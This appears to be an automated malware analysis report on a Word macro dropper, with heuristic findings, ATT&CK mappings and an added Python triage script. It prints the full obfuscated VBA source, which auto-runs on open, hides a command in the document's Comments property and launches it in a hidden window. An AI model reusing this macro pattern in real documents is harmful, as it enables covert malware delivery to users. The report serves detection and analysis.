Verdict: MALICIOUS
Risk score: 172

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1203 Exploitation for Client Execution
The sample is a malicious Word (OLE) document containing VBA macros. The critical OLE_VBA_SHELL heuristic matched a Shell$ call whose argument is assembled at run time, and both an AutoOpen entry point and a legacy WordBasic auto-exec marker were found, so the macro runs as soon as a user enables content. In the decoded source the command passed to Shell$ is not in the code at all: the macro reads the document's built-in Comments property (the property name is split into "comme" + "nts" to defeat string matching), slices characters out of it with Mid, appends "e " and launches the result with window style 0 (vbHide), so the spawned process gets no visible window. The command therefore lives in the document metadata, which this report does not display, so the exact action cannot be stated from the macro alone; the ClamAV signature (Doc.Dropper.Agent) and the hidden-window Shell$ call are consistent with a dropper that runs a download-and-execute command, but that remains an inference until the Comments property is recovered. The 'macros.bas' artifact is olevba's decoded copy of the macro source, not a file shipped inside the document; it is evidence only in the sense that it is where the Shell$ call was found. Nothing in the report points to a parser exploit: the evidence shown supports macro execution (T1059.005) after the user enables macros rather than a client-side exploitation chain.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6340624-0 [critical] CLAMAV_DETECTION
  ClamAV detected this file as malware: Doc.Dropper.Agent-6340624-0

- VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
  Document contains VBA macro code

- Potential Shell call in VBA [critical] OLE_VBA_SHELL
  Potential Shell call in VBA. Matched line in script (the trailing argument 0 is vbHide, so the process is started without a visible window; the identifiers concatenated around hMxfPTvZXC and Mid(TxxdszysVP, 40) are never assigned and add nothing to the string):
    Shell$ "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + hMxfPTvZXC + Mid(TxxdszysVP, 40) + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + avNBbuUD, 0

- AutoOpen macro [low] OLE_VBA_AUTOOPEN
  AutoOpen macro. Matched line in script:
    Sub autoopen()

- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
  OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The heuristic's canned description states that no modern VBA project was recovered and no stronger macro-virus family marker was present; the first half does not hold for this sample, since a VBA project was extracted (macros.bas below) and contains the autoopen routine, so here the finding merely corroborates the AutoOpen trigger. It is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

- Embedded URL [info] EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
  This is the standard OOXML DrawingML namespace URI that Office writes into documents containing drawing objects; it is not contacted by the macro and should not be treated as a network indicator.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9097 bytes |

SHA-256: b638b5c5245aa23762bc5b61b94655eaf41a8fc006ef47c578af98297da2f867

Detection (scan of the extracted macros.bas, not of the parent document)
- ClamAV: No threats found. The Doc.Dropper.Agent-6340624-0 signature listed under Heuristics fired on the document itself; the decoded VBA text on its own carries no ClamAV signature.
- Obfuscation or payload: likely. 76 of 99 identifiers look randomly generated (e.g. 'tFFBpbzEVBD'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script; olevba emits the empty ThisDocument class module followed by Module1)

```vba
' Call chain: autoopen -> DyEAfVFbGY -> SMUpGxrua -> Shell$.
' Every "name = 92 + 59 + ..." statement is dead arithmetic inserted as noise.
' The identifiers strung into the concatenations (UFFEwZp, MermscARvf, ...)
' are never assigned, so they are Empty and contribute nothing to the strings.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
' Builds the command prefix from slices of the Comments property and runs it.
Function SMUpGxrua()
LfMsXThHP = 92 + 59 + 62 + 89 + 60 + 99 + 99 + 64 + 61 + 67 + 58 + 57 + 100 + 76 + 76 + 66 + 63 + 81 + 83 + 63 + 87
NbMrrVRfYWR = 73 + 65 + 98 + 71 + 73 + 92 + 63 + 94 + 59 + 89 + 91 + 81 + 64 + 67 + 93 + 57 + 59 + 62
xkwmzNnXW = 66 + 59 + 57 + 75 + 74 + 93 + 61 + 99 + 64 + 58 + 76 + 63 + 65 + 79 + 89 + 90 + 100 + 98 + 77
BsBvVKDNDsa = 55 + 86 + 80 + 73 + 79 + 99 + 76 + 98 + 83 + 55 + 93 + 55 + 76
CDDGGCnFg = 79 + 58 + 78 + 57 + 89 + 70 + 87 + 81 + 78 + 83 + 72 + 82 + 95 + 100 + 84 + 99 + 99 + 95 + 92 + 73 + 96
UapYHPb = 65 + 95 + 59 + 97 + 89 + 79 + 73 + 71 + 89 + 60 + 98 + 96 + 58 + 84 + 89 + 88 + 55
' hMxfPTvZXC = Mid(comments,1,2) & Mid(comments,11,4) & Mid(comments,23,6) & "e" & " "
hMxfPTvZXC = "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + Mid(TxxdszysVP, 1, 2) + Mid(TxxdszysVP, 11, 4) + Mid(TxxdszysVP, 23, 6) + "e" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + " "
xyySnxUwWh = 75 + 92 + 88 + 97 + 59 + 93 + 64 + 65 + 85 + 59 + 88 + 61 + 95 + 75 + 99 + 56 + 62 + 96 + 92 + 63
bnPwxmSzTH = 63 + 84 + 83 + 70 + 99 + 74 + 70 + 56 + 75 + 93 + 95 + 77 + 91 + 72 + 89 + 67 + 68 + 77 + 83 + 68 + 72 + 73
pgkyPdxc = 66 + 62 + 83 + 96 + 98 + 64 + 69 + 85 + 77 + 73 + 76 + 89 + 81 + 78 + 68 + 66 + 58 + 97 + 60 + 82 + 70 + 62
gRWHnrEt = 72 + 74 + 87 + 80 + 78 + 75 + 100 + 63 + 99 + 56 + 61 + 81 + 55 + 90 + 58
RfVrhVuA = 77 + 77 + 78 + 67 + 61 + 69 + 90 + 93 + 80 + 76 + 71 + 85 + 80 + 86 + 99 + 80 + 88
' Shell$ prefix & Mid(comments,40), window style 0 = vbHide (no visible window)
Shell$ "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + hMxfPTvZXC + Mid(TxxdszysVP, 40) + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + avNBbuUD, 0
RUtyUCDcc = 72 + 84 + 68 + 80 + 64 + 86 + 68 + 94 + 89 + 92 + 69 + 56 + 97 + 82
FMsaKtzT = 82 + 60 + 64 + 77 + 68 + 67 + 65 + 60 + 58 + 87 + 95 + 57 + 94 + 69 + 62 + 77 + 85 + 88 + 99 + 95 + 80 + 57
AGdDUfwr = 73 + 77 + 78 + 82 + 65 + 68 + 59 + 88 + 62 + 86 + 85 + 64 + 68 + 100 + 100 + 62
FPhrazsVz = 92 + 57 + 92 + 59 + 61 + 71 + 83 + 63 + 96 + 93 + 100 + 76 + 91 + 95 + 65 + 85 + 64 + 94 + 77 + 72 + 84 + 66
mMtWDypM = 83 + 89 + 61 + 81 + 55 + 78 + 82 + 59 + 88 + 76 + 60 + 100 + 77 + 67 + 85 + 88 + 63 + 70 + 82 + 81 + 67 + 66
End Function
' Returns the document's Comments property. The property name is assembled as
' "comme" + "nts" so that the literal "comments" never appears in the source.
Function TxxdszysVP()
kELBCRvxK = 98 + 82 + 93 + 80 + 75 + 99 + 96 + 98 + 99 + 59 + 66 + 76 + 99 + 86 + 68 + 97 + 55 + 98 + 88 + 86 + 55 + 82 + 79
FdpkpHT = 66 + 83 + 96 + 70 + 97 + 68 + 83 + 97 + 99 + 59 + 76 + 55 + 61 + 94 + 56 + 91 + 63 + 71 + 58 + 66 + 76 + 64 + 63 + 78 + 57 + 88
UbPUYpBKgp = 79 + 78 + 69 + 55 + 73 + 97 + 70 + 75 + 65 + 78 + 92 + 93 + 92 + 71 + 66 + 95 + 90 + 99 + 63 + 78 + 97 + 74
TsPEutAZ = 69 + 89 + 55 + 86 + 56 + 71 + 96 + 74 + 87 + 74 + 94 + 88 + 59 + 89 + 88 + 97 + 68 + 68 + 95 + 68 + 81 + 67 + 74 + 69 + 61 + 61
tMFRXUCsufw = 83 + 88 + 86 + 89 + 91 + 63 + 61 + 87 + 92 + 70 + 80 + 62 + 87 + 100 + 57 + 64 + 72 + 74 + 67
ytcRXpt = 58 + 97 + 86 + 70 + 100 + 87 + 59 + 93 + 77 + 97 + 56 + 73 + 88 + 93 + 59 + 77 + 71 + 75 + 56 + 98 + 99 + 65 + 75 + 64
AKMnVPdkUnv = "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + "comme" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + "nts" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + cYwdSEuMaLm
PKHEvBdfFNg = 96 + 73 + 95 + 63 + 93 + 60 + 90 + 89 + 58 + 61 + 83 + 86 + 57 + 68 + 71 + 79
payrRwDY = 71 + 66 + 91 + 74 + 86 + 83 + 69 + 80 + 88 + 92 + 92 + 78 + 92 + 63 + 95 + 86 + 60 + 93 + 78 + 86
SCtxvMwZHXH = 77 + 98 + 70 + 86 + 86 + 71 + 70 + 60 + 99 + 76 + 57 + 82 + 70 + 61 + 100 + 91 + 89 + 80 + 86 + 91 + 89 + 87 + 93
aabLxWv = 68 + 61 + 73 + 92 + 99 + 72 + 68 + 88 + 63 + 75 + 80 + 90 + 92 + 96 + 83 + 98 + 68 + 80 + 56 + 79 + 59 + 60 + 64 + 67 + 67
RxNcSut = 94 + 71 + 96 + 75 + 81 + 62 + 93 + 84 + 97 + 86 + 97 + 87 + 86 + 91 + 72 + 97 + 62 + 90 + 81 + 95 + 72
DTmLCTawM = 61 + 68 + 72 + 70 + 72 + 94 + 56 + 71 + 69 + 70 + 80 + 93 + 69 + 76 + 96 + 84 + 98 + 71
TFNMbKCMy = 72 + 78 + 78 + 98 + 72 + 87 + 89 + 83 + 63 + 60 + 99 + 94 + 67 + 99 + 75 + 93 + 76 + 72 + 93 + 95 + 58 + 67 + 87
TxxdszysVP = "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + ActiveDocument.BuiltInDocumentProperties(AKMnVPdkUnv) + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + XZUsuxuC
FLrMuYmra = 57 + 60 + 74 + 61 + 73 + 76 + 71 + 89 + 61 + 99 + 99 + 78 + 90 + 90 + 61 + 91 + 81
SnwwedTTXTe = 80 + 93 + 55 + 89 + 64 + 90 + 99 + 70 + 64 + 85 + 62 + 98 + 59 + 78 + 87 + 67 + 80 + 79 + 70
cNXfbNEa = 84 + 70 + 88 + 57 + 93 + 100 + 84 + 84 + 59 + 83 + 60 + 82 + 83 + 89 + 83 + 93 + 69 + 79
dsSgEZArZF = 79 + 55 + 83 + 95 + 95 + 83 + 75 + 98 + 71 + 74 + 89 + 66 + 66 + 78 + 69 + 89 + 83 + 66 + 56 + 81 + 81 + 81 + 90 + 68 + 92 + 69 + 76 + 97 + 67 + 87 + 99 + 97
fTDGbCuF = 95 + 77 + 76 + 99 + 78 + 100 + 56 + 85 + 88 + 56 + 71 + 84 + 75 + 90 + 92 + 59 + 56 + 85 + 97 + 98 + 96 + 65 + 56 + 87 + 83 + 83
uwSZRfndptx = 72 + 60 + 65 + 70 + 98 + 61 + 79 + 93 + 61 + 56 + 71 + 72 + 68
mmvcBCyBBzt = 60 + 73 + 73 + 85 + 81 + 57 + 95 + 98 + 98 + 74 + 67 + 68 + 85 + 66 + 95 + 69 + 77
End Function
' Intermediate hop between the entry point and the routine that calls Shell$.
Sub DyEAfVFbGY()
awVtxsHKD = 99 + 83 + 81 + 67 + 84 + 63 + 92 + 86 + 78 + 95 + 77 + 90 + 83 + 79 + 56 + 95 + 76 + 94 + 57 + 100 + 98 + 55 + 98 + 91 + 80 + 76
CdMUTGvdZA = 91 + 70 + 86 + 69 + 64 + 84 + 55 + 77 + 95 + 85 + 68 + 83 + 93 + 60 + 87 + 87 + 90 + 85 + 84 + 60 + 95 + 71
zFpNNCLkUN = 91 + 92 + 89 + 81 + 71 + 82 + 69 + 63 + 68 + 94 + 80 + 64 + 56 + 85 + 86 + 80 + 64 + 72 + 86 + 79
fesdZwvFv = 61 + 56 + 97 + 93 + 93 + 80 + 97 + 84 + 89 + 91 + 82 + 100 + 88 + 55 + 100 + 84 + 59 + 71 + 97 + 77 + 83
uPGcDGvc = 67 + 80 + 94 + 55 + 55 + 68 + 92 + 58 + 70 + 73 + 90 + 55 + 92 + 71 + 56 + 98 + 99 + 69 + 67 + 78 + 75
yTWGrtDcV = 86 + 73 + 81 + 69 + 82 + 75 + 88 + 65 + 87 + 74 + 59 + 76 + 82 + 84 + 71 + 89
SMUpGxrua
TsbVezpFSNr = 60 + 91 + 86 + 97 + 65 + 64 + 63 + 89 + 62 + 94 + 71 + 62 + 99
XaXbzbhtAt = 86 + 58 + 81 + 58 + 63 + 69 + 56 + 85 + 87 + 80 + 92 + 92 + 67 + 70 + 74 + 74 + 62 + 61
LzHDDZvS = 98 + 88 + 62 + 57 + 80 + 63 + 86 + 96 + 60 + 80 + 65 + 58 + 59 + 81 + 86 + 67 + 82 + 63 + 90 + 58
mMEFwvcUTBk = 62 + 85 + 55 + 84 + 71 + 79 + 82 + 73 + 72 + 94 + 87 + 61 + 72 + 86 + 86 + 83 + 84 + 90 + 81 + 70 + 68 + 60 + 96 + 60 + 77 + 79 + 56
mxhmNKASgr = 99 + 100 + 88 + 78 + 55 + 74 + 86 + 61 + 72 + 96 + 91 + 87 + 79 + 68 + 75 + 85 + 59 + 64 + 77
VKhhVxYwDss = 63 + 72 + 100 + 78 + 73 + 79 + 60 + 90 + 92 + 90 + 92 + 78 + 88 + 94 + 83 + 99 + 83 + 91 + 85 + 56 + 64 + 85 + 66 + 69 + 100 + 98
uLypGEaw = 100 + 58 + 77 + 97 + 79 + 92 + 85 + 99 + 99 + 91 + 75 + 82 + 98 + 85 + 93 + 98
End Sub
' Auto-exec entry point: Word runs this when the document opens with macros enabled.
Sub autoopen()
avrPreFPA = 100 + 63 + 78 + 90 + 71 + 56 + 68 + 83 + 77 + 70 + 82 + 82 + 62 + 69 + 100 + 73 + 82 + 82 + 96 + 69
XsdndfxXk = 88 + 66 + 64 + 93 + 65 + 72 + 59 + 77 + 83 + 61 + 92 + 73 + 78 + 63 + 96 + 82 + 72
epHeyVxU = 78 + 63 + 71 + 79 + 56 + 62 + 85 + 63 + 77 + 76 + 74 + 64 + 95 + 62 + 98 + 57 + 68 + 81
tzyGYTAbft = 69 + 84 + 83 + 96 + 58 + 97 + 55 + 77 + 58 + 55 + 75 + 84 + 82 + 92 + 68 + 57 + 93 + 85 + 95 + 95 + 59
ynpsKeY = 60 + 65 + 89 + 78 + 87 + 86 + 95 + 68 + 76 + 62 + 67 + 69 + 91 + 99 + 98 + 80 + 76 + 82 + 67 + 85 + 94 + 79 + 68 + 65 + 95
HrgnxUf = 61 + 63 + 65 + 74 + 73 + 64 + 98 + 63 + 88 + 64 + 60 + 66 + 83 + 86 + 59 + 88 + 58 + 79
DyEAfVFbGY
tFFBpbzEVBD = 95 + 85 + 64 + 83 + 63 + 82 + 81 + 91 + 86 + 62 + 87 + 82 + 72 + 98 + 84 + 82 + 67 + 80 + 74 + 87 + 92 + 83 + 92 + 59 + 90 + 79 + 79
wWxbdvzHZu = 84 + 64 + 97 + 72 + 75 + 62 + 88 + 96 + 73 + 69 + 100 + 69 + 76 + 76 + 77 + 98 + 72 + 73 + 84 + 96 + 81 + 97 + 97 + 89
UwkSNDsM = 94 + 74 + 67 + 78 + 65 + 60 + 60 + 84 + 88 + 60 + 59 + 64 + 89 + 91 + 69 + 80 + 66
rBfuFxXEn = 100 + 80 + 91 + 62 + 89 + 90 + 92 + 98 + 62 + 66 + 70 + 66 + 95 + 58 + 71 + 78 + 55 + 62
ZNZYbtVGX = 65 + 65 + 73 + 90 + 88 + 56 + 88 + 65 + 77 + 97 + 79 + 80 + 66 + 65 + 81 + 75 + 100 + 100 + 91 + 57 + 75 + 88 + 82 + 60 + 73
NDwLRskNRm = 99 + 68 + 74 + 95 + 60 + 56 + 96 + 79 + 70 + 70 + 56 + 79 + 95 + 61 + 88 + 83 + 63
VCLfrCtNZC = 79 + 62 + 59 + 99 + 74 + 87 + 56 + 68 + 87 + 81 + 69 + 55 + 89 + 91 + 95 + 75 + 94 + 61 + 59 + 66
End Sub
```
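The two analyst questions this artifact raises are "how was the name-mangling ratio computed?" and "what does the Shell$ line actually run?". The script below is an added example written for this page, not the analyzer's code or anything shipped with oletools. It reproduces both on constructed input: a scoring heuristic for machine-generated identifiers (the exact rules the analyzer uses are not published on the page, so these are an assumption), and a decoder that mirrors the macro's Mid() slicing of the Comments property. `SAMPLE_VBA` and `SAMPLE_COMMENTS` are constructed here; the real document's Comments value is not shown in the report, so the decoded command in the demo is illustrative only. `comments_from_ole` uses the olefile package to pull the property from a real .doc and is not exercised offline.

```python
"""Triage helpers for the macro above (added example, not the analyzer's code)."""
import re
from typing import List, Optional, Tuple

# VBA keywords and object names used by the macro; every other bare identifier
# is treated as an author-chosen name and scored for randomness.
VBA_KEYWORDS = {"Attribute", "Function", "End", "Sub", "Dim", "As", "String",
                "Shell", "Mid", "ActiveDocument"}


def looks_random(name: str) -> bool:
    """Heuristic for mangled names such as 'tFFBpbzEVBD' (assumed rules).

    Flags a name with two adjacent capitals, a capital after the first character
    that is not followed by a lowercase letter, a run of five or more
    consonants, or fewer than 20% vowels. CamelCase API names such as
    'BuiltInDocumentProperties' pass all four checks.
    """
    if re.search(r"[A-Z]{2}", name):
        return True
    if re.search(r"[A-Z](?![a-z])", name[1:]):
        return True
    if re.search(r"(?i)[b-df-hj-np-tv-z]{5}", name):
        return True
    vowels = sum(c in "aeiouAEIOU" for c in name)
    return vowels / len(name) < 0.2


def identifier_report(vba_src: str) -> Tuple[int, int, List[str]]:
    """Return (random_count, total_count, flagged_names) for decoded VBA text."""
    names = set()
    for line in vba_src.splitlines():
        if line.startswith("Attribute "):        # module metadata, not code
            continue
        line = re.sub(r'"[^"]*"', '""', line)   # string literals are not identifiers
        # Skip member accesses (".Name", ".BuiltInDocumentProperties").
        for m in re.finditer(r"(?<![\w.])[A-Za-z][A-Za-z0-9_]*", line):
            if m.group(0) not in VBA_KEYWORDS:
                names.add(m.group(0))
    flagged = sorted(n for n in names if looks_random(n))
    return len(flagged), len(names), flagged


def vb_mid(s: str, start: int, length: Optional[int] = None) -> str:
    """VBA Mid(): 1-based start, optional length, clipped at end of string."""
    i = start - 1
    return s[i:] if length is None else s[i:i + length]


def reconstruct_command(comments: str) -> str:
    """Rebuild the Shell$ argument from the Comments property as the macro does.

    hMxfPTvZXC = Mid(c,1,2) + Mid(c,11,4) + Mid(c,23,6) + "e" + " ", then
    Shell$ hMxfPTvZXC + Mid(c,40), 0. The padding identifiers are Empty and
    contribute nothing, so they are omitted here.
    """
    head = (vb_mid(comments, 1, 2) + vb_mid(comments, 11, 4)
            + vb_mid(comments, 23, 6) + "e" + " ")
    return head + vb_mid(comments, 40)


def comments_from_ole(path: str) -> str:
    """Read the Comments property of an OLE2 .doc with olefile (pip install olefile)."""
    import olefile
    ole = olefile.OleFileIO(path)
    try:
        value = ole.get_metadata().comments
    finally:
        ole.close()
    if isinstance(value, bytes):                # SummaryInformation strings are codepage bytes
        value = value.decode("latin-1")
    return value or ""


# Constructed, trimmed-down copy of the macro's shape (assumption, not the sample).
SAMPLE_VBA = '''Attribute VB_Name = "Module1"
Function SMUpGxrua()
Dim docName As String
docName = ActiveDocument.Name
LfMsXThHP = 92 + 59 + 62
hMxfPTvZXC = "" + UFFEwZp + Mid(TxxdszysVP, 1, 2) + Mid(TxxdszysVP, 11, 4) + Mid(TxxdszysVP, 23, 6) + "e" + " "
Shell$ "" + hMxfPTvZXC + Mid(TxxdszysVP, 40), 0
End Function
Function TxxdszysVP()
AKMnVPdkUnv = "" + "comme" + "nts"
TxxdszysVP = "" + ActiveDocument.BuiltInDocumentProperties(AKMnVPdkUnv)
End Function
Sub autoopen()
SMUpGxrua
End Sub
'''

# Constructed Comments value laid out to exercise the offsets 1-2, 11-14, 23-28, 40+.
SAMPLE_COMMENTS = "po" + "x" * 8 + "wers" + "x" * 8 + "hell -" + "x" * 11 + "QUJD"

if __name__ == "__main__":
    rnd, total, flagged = identifier_report(SAMPLE_VBA)
    print(f"{rnd} of {total} identifiers look randomly generated: {flagged}")
    print("Shell$ argument:", reconstruct_command(SAMPLE_COMMENTS))
```

On a real submission, feed `reconstruct_command(comments_from_ole("sample.doc"))` the document itself; the decoded string is the process command line to hunt for in EDR telemetry (parent process WINWORD.EXE, hidden window), which is a far more specific indicator than the macro's randomised identifiers.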